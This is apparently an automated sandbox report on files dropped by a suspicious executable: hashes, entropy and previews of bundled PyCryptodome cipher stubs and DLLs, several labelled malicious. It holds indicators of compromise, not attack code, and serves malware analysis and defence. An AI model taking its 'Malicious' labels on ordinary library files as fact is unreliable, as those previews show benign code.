                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1107
                                                                                                                                            Entropy (8bit):4.862920256864568
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElsAIfUA0nRNne3yFnR3Fne3TP/Wwn90nf5GodLVYBy:tfUJvesLeiwanoo+w
                                                                                                                                            MD5:DED98A1B5B497FB5816021E8B6E5F6F4
                                                                                                                                            SHA1:977F227DD05557AEDD8C40E653D74AEAF3734A43
                                                                                                                                            SHA-256:6D880A3628C47D9BCE851019C82720D570F44699E1B453AF432AE4A7B20A1273
                                                                                                                                            SHA-512:C6494CE19133C645285D7ACA56AD2F0D9E978ED2C4C7BB58A9C90B095A360DA3881E0D6F308F3B01508A331CCBF070690543BAC826FF47E8F9153949D92D9EF4
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Tuple, overload, Optional....Buffer = bytes|bytearray|memoryview....class ChaCha20Poly1305Cipher:.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... def update(self, data: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, received_mac_tag: str) -> None: ..... def encrypt_and_digest(self, plaintext: Buffer) -> Tuple[bytes, bytes]: ..... def decrypt_and_verify(self, ciphertext: Buffer, received_mac_tag: Buffer) -> bytes: .......def new(key
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1001
                                                                                                                                            Entropy (8bit):4.909258900429456
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+Aiv7Hoc6iTD3IouwDNqDNMN3zb1DoeRHT:K+1+O+O+s+8+s+w+H7XY6JqJejbFoeRz
                                                                                                                                            MD5:1EA64CB2FDD42F20112DF249B9A7CB87
                                                                                                                                            SHA1:633110F4D03C3EDF415640989802108EC2764422
                                                                                                                                            SHA-256:98BBDA18A15E4757AB66CC049EADA7FE944FF2D1093EE70F643D634CAF296E7E
                                                                                                                                            SHA-512:2845EBEC10C8250A0B4C7D0AB87245CF91D07D0F0973B0289516F94494D5698E17A9709D1B411B04908F02FC83B0922F0AEDEADF7901106184EA247729DAADF8
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....DESMode = int....MODE_ECB: DESMode..MODE_CBC: DESMode..MODE_CFB: DESMode..MODE_OFB: DESMode..MODE_CTR: DESMode..MODE_OPENPGP: DESMode..MODE_EAX: DESMode....def new(key: Buffer,.. mode: DESMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_size: int.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1073
                                                                                                                                            Entropy (8bit):4.981416466224206
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENbKAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+4NINSfWvOkDoEDNqDNMN3zb1DoeRHYX:KI1+O+O+s+8+s+w+4GxOkDRJqJejbFo7
                                                                                                                                            MD5:4E6C49F8750DD064B28D3138434CC5F3
                                                                                                                                            SHA1:121984851A159ED24D11E4E79DF4B0B4BCF6AE63
                                                                                                                                            SHA-256:9005CB3F60F682B7840F7112D940128AE8EA1777DAC8C1F3A4B8F0E17F6A398B
                                                                                                                                            SHA-512:E21FC0A0B2D2CCD167CC2B9B0B9DE66771B11AF4CF2D9510F53E029D1CC43407A03B2866C000E6E31975C73B9457BB3CB99317E8FC51D276B84C93E9CC6CBEB3
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Dict, Tuple, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....def adjust_key_parity(key_in: bytes) -> bytes: .......DES3Mode = int....MODE_ECB: DES3Mode..MODE_CBC: DES3Mode..MODE_CFB: DES3Mode..MODE_OFB: DES3Mode..MODE_CTR: DES3Mode..MODE_OPENPGP: DES3Mode..MODE_EAX: DES3Mode....def new(key: Buffer,.. mode: DES3Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, C
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1214
                                                                                                                                            Entropy (8bit):4.8233945885346685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REjQFC19+1bs1zrhqMS8KDLYOT3OMIAl2HH8Myje+RGoziVEpvNtMEHo:gQFy+1o1IttDLteMI5aoJupVjHo
                                                                                                                                            MD5:A065FCD801FD38FDC5457C65A8B94801
                                                                                                                                            SHA1:7C353866EA0CFC0E55A90530714758115424B723
                                                                                                                                            SHA-256:DFEAE2746DEFD28744873401D008462C4C1EF4899B7BAFAEAE14FCA12A5BB73E
                                                                                                                                            SHA-512:959C65295EA6C93D67E7C1E5361A03C09CB7A37C7C64A92334A0C612952C3609708766780C99BD93DD5A9C23D79B7A3CF0C0614D083A13F3F9A8D5DBC3E6C7A2
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Optional, Union, Callable, Any, overload..from typing_extensions import Protocol....from Crypto.PublicKey.RSA import RsaKey....class HashLikeClass(Protocol):.. digest_size : int.. def new(self, data: Optional[bytes] = ...) -> Any: .......class HashLikeModule(Protocol):.. digest_size : int.. @staticmethod.. def new(data: Optional[bytes] = ...) -> Any: .......HashLike = Union[HashLikeClass, HashLikeModule]....Buffer = Union[bytes, bytearray, memoryview]....class PKCS1OAEP_Cipher:.. def __init__(self,.. key: RsaKey,.. hashAlgo: HashLike,.. mgfunc: Callable[[bytes, int], bytes],.. label: Buffer,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: RsaKey,.. hashAlgo: O
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):706
                                                                                                                                            Entropy (8bit):4.785885591583499
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB1mmN+1bgBxpvIY3NwnNc1AlPcJZVyMnynj5wnZ03Rqqav+IAAozPmJifJEt:1REq7+1bspT3ENIAlUH8Myje+wqKozuP
                                                                                                                                            MD5:48B6BF106FC448220A97A73FBFA2425F
                                                                                                                                            SHA1:9899751126284AEC60B7D2C28047A93063B9CB20
                                                                                                                                            SHA-256:219BE400169E585320C518A50540EDA12E3C4F489322C42D56FDAD283D07A021
                                                                                                                                            SHA-512:D05EF3D93B5460A172FC3AB0E21B256CA3CE7BA3C7569E8074E01FDA2A7A309F63EEA6D7FB17D501DC77EC639C963B6D07A0EB0094A6DBF6C4645A30FB46D36E
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Callable, Union, Any, Optional, TypeVar....from Crypto.PublicKey.RSA import RsaKey....Buffer = Union[bytes, bytearray, memoryview]..T = TypeVar('T')....class PKCS115_Cipher:.. def __init__(self,.. key: RsaKey,.. randfunc: Callable[[int], bytes]) -> None: ..... def can_encrypt(self) -> bool: ..... def can_decrypt(self) -> bool: ..... def encrypt(self, message: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer,.. sentinel: T,.. expected_pt_len: Optional[int] = ...) -> Union[bytes, T]: .......def new(key: RsaKey,.. randfunc: Optional[Callable[[int], bytes]] = ...) -> PKCS115_Cipher: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):770
                                                                                                                                            Entropy (8bit):4.753367031924495
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElTcAI4zFeBFAtnRNne3yFnR3Fne3rod8VYi:N4heryvesLe71+i
                                                                                                                                            MD5:F43BFBB1DE638F92162C8659DEFF5FCC
                                                                                                                                            SHA1:791719D6BDC25E30D7B0A7DB4AF08FF1A621A083
                                                                                                                                            SHA-256:EDCD33B9365AD546CF6B01C7FEFC73F1E7558BB50BFDB47FEF26212C2E027AE6
                                                                                                                                            SHA-512:1EEDEBCBCE99C19C2F489DDBD7B0C1B9020CBBC4A29C9E2E02AF3BA3FBECE0AB1E4F97BE2A62148F1E90B77B7B4AB88DAC847902BB984C7C4787D4B88D113B4B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Tuple, Optional, overload, Optional....Buffer = bytes|bytearray|memoryview....class Salsa20Cipher:.. nonce: bytes.. block_size: int.. key_size: int.... def __init__(self,.. key: Buffer,.. nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> Salsa20Cipher: .......block_size: int..key_size: Tuple[int, int]....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11264
                                                                                                                                            Entropy (8bit):4.703513333396807
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:nDzb9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDV90OcX6gY/7ECFV:Dzz9damqTrpYTst0E5DVPcqgY/79X
                                                                                                                                            MD5:6176101B7C377A32C01AE3EDB7FD4DE6
                                                                                                                                            SHA1:5F1CB443F9D677F313BEC07C5241AEAB57502F5E
                                                                                                                                            SHA-256:EFEA361311923189ECBE3240111EFBA329752D30457E0DBE9628A82905CD4BDB
                                                                                                                                            SHA-512:3E7373B71AE0834E96A99595CFEF2E96C0F5230429ADC0B5512F4089D1ED0D7F7F0E32A40584DFB13C41D257712A9C4E9722366F0A21B907798AE79D8CEDCF30
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4822
                                                                                                                                            Entropy (8bit):5.292220729270199
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:bawqXvaWWWa+aj9iivDDMq1sNp91+7moVH4y2S:bactjV3oN/1+7mQ/
                                                                                                                                            MD5:40FC9EA391140E569771CA1620CF30E3
                                                                                                                                            SHA1:001BDC9A6D90C20BB8AB21B35AE1AE3C330D82F0
                                                                                                                                            SHA-256:F387FB5BFB82878BC35AAD7CC72C73E5ED85551F6F52B5617C4A97B962B96A7B
                                                                                                                                            SHA-512:A20088AE9B51E6CB3E986F6163FB48E2D0E4D29E7E082698933BDD4A9C59B8900BA54016F37A914E690EF60DA0C7DEB02623A84364AC757C42B4A09C3123CF18
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................~.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z.d...Z.d...Z.d.Z.d.Z...e.d.d...............Z.d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr..c_uintz.Crypto.Cipher._raw_eksblowfishaa.... int EKSBlowfish_start_operation(const uint8_t key[],. size_t key_len,. const uint8_t salt[16],. size_t salt_len,. unsigned cost,. unsigned invert,. void **pResult);. int EKSBlowfish_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int EKSBlowfish_decrypt(const void *state,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):281
                                                                                                                                            Entropy (8bit):4.919666506917015
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBNHK+kb/Vfw1ggHzrIY3MTDyo5Alm0Wgw0Tm6sRy/6WXHg:1REYBQ+kzlbgHvIY3YyogmvNZRy/O
                                                                                                                                            MD5:4030500BC383DEE6F4BBDF228147813E
                                                                                                                                            SHA1:DE9B1C78DD481B3B42A29AB5485C2C1B3EDFF182
                                                                                                                                            SHA-256:4917140D2EAE01669B206BEAB2164796D2DF836CFBD8ACCC9189CF4E6EEBEDB2
                                                                                                                                            SHA-512:FCAE9156019C79B2033E53F4F0626FD729F8B99F6EB73C837330D5AE079F19CCBA33A7EB2C72CC3055C365B2ED272AFCD7313310A9C2F1120EA16FF0E7AFF63A
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Iterable....from Crypto.Cipher._mode_ecb import EcbMode....MODE_ECB: int....Buffer = Union[bytes, bytearray, memoryview]....def new(key: Buffer,.. mode: int,...salt: Buffer,...cost: int) -> EcbMode: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13824
                                                                                                                                            Entropy (8bit):5.061461040216793
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ldF/1nb2mhQtkXn0t/WS60YYDEiqvdvGyv9lkVcqgYvEMo:v2f6XSZ6XYD6vdvGyv9MgYvEMo
                                                                                                                                            MD5:CB5238E2D4149636377F9A1E2AF6DC57
                                                                                                                                            SHA1:038253BABC9E652BA4A20116886209E2BCCF35AC
                                                                                                                                            SHA-256:A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
                                                                                                                                            SHA-512:B1E6AB509CF1E5ECC6A60455D6900A76514F8DF43F3ABC3B8D36AF59A3DF8A868B489ED0B145D0D799AAC8672CBF5827C503F383D3F38069ABF6056ECCD87B21
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10506
                                                                                                                                            Entropy (8bit):5.3104246753396716
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:K226kvwbQ9XIgEggPI4nx3ZJpSSmRWiHgVt834mGvWcsQAn9rdLt83425pKIn+1Y:KabJsgPI4x3ZAWdU4c7U4QnKejRgVA
                                                                                                                                            MD5:8D3F55D6E79437B30ECA3C04F33EF552
                                                                                                                                            SHA1:D6A077A82B9D536F5C919270B760413B194BF540
                                                                                                                                            SHA-256:9E6DF51261AE72720DEAC882FF602A9D4671EBE7C0874F364225583FC7003220
                                                                                                                                            SHA-512:8ADFFB272F5FA333D0AAFE49F7314AF08346D02CB1AF09595DA1AB228A698B819E39901F929E13CECBD2280110D41C300399C88BDAEDA1BE6D7D091267DF45BA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.+.............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z'.Ciphertext Block Chaining (CBC) mode....CbcMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cbca..... int CBC_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int CBC_encrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CBC_decrypt(void *cbcState,. const uint8_t *in,. uint8_t
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):712
                                                                                                                                            Entropy (8bit):4.750220080456401
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDHiIRyE1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT35istAY4nRNne3yFnR3Fne38
                                                                                                                                            MD5:30DD017C0985A1EFF693D631609C1DB6
                                                                                                                                            SHA1:378924C68A2872C951B6AB0291014CD3DD3C3B9C
                                                                                                                                            SHA-256:BCD20F1E0C545F56F186640614FEB8B125A2627F7A56F36DA2A3B2040EFE6FFC
                                                                                                                                            SHA-512:8029C5F0C2789E73A777C9F7609170DE099DDAF80CFDFDC912D2A48740661A5F831B729D7A2CCCC8A4A32CC22CE22480D4871615F49BCE958DB154B9120D4A3C
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CbcMode']....class CbcMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.... def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25872
                                                                                                                                            Entropy (8bit):5.359526059929995
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/q/qgU1Xl1wB3ziI4SiI4QuogPD8jLmv4SeWPj7KzPc4KqE6L:/5/wJDEI4VPWmvxeG7KsU
                                                                                                                                            MD5:E11F36C8C4A9CBE0796C2DCEC41726FD
                                                                                                                                            SHA1:7568F09415882FD8C1C2F520B7C852AB93D4979E
                                                                                                                                            SHA-256:991848B3E440CD8B51B36BE46C10B1802838E5E9372B49EBB5C4B33F301499E6
                                                                                                                                            SHA-512:CBA688616B4CDA3B8260A014AFCC29814CEF026C0428EEB4CC887149790B07CBD4B078E8AF367CEC0CB5899F6ADFA6527A6C176539C3CBBB2023C9B7E8BB1D10
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1647
                                                                                                                                            Entropy (8bit):4.397477650476907
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7CnbKT3fAbSUA9UUOHMnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cuuvUXUO8vesLeJLn8nlEF49
                                                                                                                                            MD5:91133F991531450E28EE3F680FBF6F20
                                                                                                                                            SHA1:BB3761FBD4A0F912A77258D73B30D7E43403130E
                                                                                                                                            SHA-256:5F0058DE990A9668E5B0CE2273E74E0D5BFDF79F5E6745DC9B8FAEB39822A9AD
                                                                                                                                            SHA-512:F5FAF2155B4D172D3DDAF556DF2EF28E5CE93CE81F471AED1D7215C658EF03C9DAB71FA3BDABD3133951A1A64EA628587F8390D330280518B2CA60F0E6451D74
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, overload, Dict, Tuple, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CcmMode']....class CcmMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. msg_len: int,.. assoc_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> CcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str:
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10920
                                                                                                                                            Entropy (8bit):5.295317136675577
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:hn3jDCxEZXorrU4B/NU4DfZZkZZZZqj6PVnx:VrZXoXTBFTDnjsx
                                                                                                                                            MD5:393CAE34392F45D380ECD70712FFC34F
                                                                                                                                            SHA1:FA15CAB673307C7B40BE16D986117C8EC41817F8
                                                                                                                                            SHA-256:401118DEA55BE4ECA55B79414794B77175DEC96C15625B37A7241420796A7951
                                                                                                                                            SHA-512:4BF06C0063138B3A6391BDCC8D4EF3BAB48EA3DD258A30CCADC5EC0CF68134085FA15E1E98054C46218CEDE58FD05A4108382C8F3553824AA3816A71A9AE7C92
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):753
                                                                                                                                            Entropy (8bit):4.690976940000698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDDHo2YRyU1AOlsQRZFq6R5pFq6jI33ynFq6R5xnFq6jIF:1REP+LjT3lGNAYsEHnRNne3yFnR3Fne1
                                                                                                                                            MD5:652CF8ED15152064BFF8807277058B5A
                                                                                                                                            SHA1:D868B6EBCDF4B5AE76DD495FBD506879BCE96B88
                                                                                                                                            SHA-256:FA48D3431DA67394394BCFC79AFA506311A5579E9234299215B06514EC72EDEA
                                                                                                                                            SHA-512:2354A738EBA79324311746672CFB436ECB558212FCFC044030A1C932F0E6EC74E539A38994A1BB7F69D5B84EB2C2F49EDAE11243A8D4B11B6B304425FBE8334F
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CfbMode']......class CfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer,.. segment_size: int) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15579
                                                                                                                                            Entropy (8bit):5.3327194767816986
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:2OGDPkH7KxiM16TsyriFfU4PkdU4fYrLEjnSknkjvjfAhSssTM:2Fb0SDw2fTPkdTfYrL0Skn+vj3sf
                                                                                                                                            MD5:AE1C90E5F1E3DBF86F039EFCFBB65061
                                                                                                                                            SHA1:34A7828D1007FB477FC1292A29B553446E4C743F
                                                                                                                                            SHA-256:352020EB6D2BF55A74E7B713FC95EE04351A6AF071886F3A14437246C25BA58E
                                                                                                                                            SHA-512:42814697BACEB7BE47615924245E0208FB617D7281E6DB648D7E9C08D778069C88041BD3DB5A7576600F8F1E8EB67A0622FC66364C7F2032CD0A5AB553FBF09F
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):827
                                                                                                                                            Entropy (8bit):4.593860739765962
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REP+LjT3Q6fUAY4AVjjnRNne3yFnR3Fne38:Y+rLcZVjTvesLeM
                                                                                                                                            MD5:8A35D43812049862067E29C878476C74
                                                                                                                                            SHA1:A12D8A91A7657976F857C769188B625FA27F0697
                                                                                                                                            SHA-256:D5EAD8152A6D1DA357A8B3B4D79E468B3A1201CB4406E83951F7B32F48A2FD1D
                                                                                                                                            SHA-512:18F5C59C21EFB6867FE1B837E0ECC55524B2382F0C95A493CEE012DB691C1B0D6D3BED81D46CDBEE48A9D4C11CE47726F38A98E398557141E90B794B61D25017
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CtrMode']....class CtrMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. block_cipher: SmartPointer,.. initial_counter_block: Buffer,.. prefix_len: int,.. counter_len: int,.. little_endian: bool) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16128
                                                                                                                                            Entropy (8bit):5.3516714389406586
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:LwX+X6zFM4jDTFVyfTHMR/A7Ip47ai99kGz90cW3m/F:LjX6KwloIJu7amHz943s
                                                                                                                                            MD5:468F6F7D8049923F67B2391E37943617
                                                                                                                                            SHA1:C17962C6E423C96043C305AFD0E36F55ECAFA4B0
                                                                                                                                            SHA-256:A9FD3CE298DC3B8A9A44109947B1942B3DDF207874A281AD60C4DACFCBD77534
